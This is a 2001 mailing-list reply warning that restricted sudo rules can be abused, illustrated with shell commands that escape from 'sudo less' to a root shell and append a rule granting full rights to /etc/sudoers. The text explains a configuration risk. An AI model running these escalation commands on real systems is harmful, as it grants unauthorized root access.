On Fri, Jul 06, 2001 at 09:43:55AM -0500, Nathan E Norman wrote: > > OTOH if you restrict the user to a list of commands in /etc/sudoers, > it's wise to consider whether the user might be able to leverage one of > those commands to edit /etc/sudoers (or any other file). If you're > going to list "emacs" or "vi" in /etc/sudoers, you might as well just > list "ALL" :) or even seemingly innocuous things like less or even cat. sudo less anything !/bin/sh whoami r00t! echo me ALL=ALL > s sudo 'cat s >> /etc/sudoers' sudo is a very large cannon which is difficult to keep aimed away from the foot... -- Ethan Benson http://www.alaska.net/~erbenson/
Attachment:
pgpqJaFcEiKtx.pgp
Description: PGP signature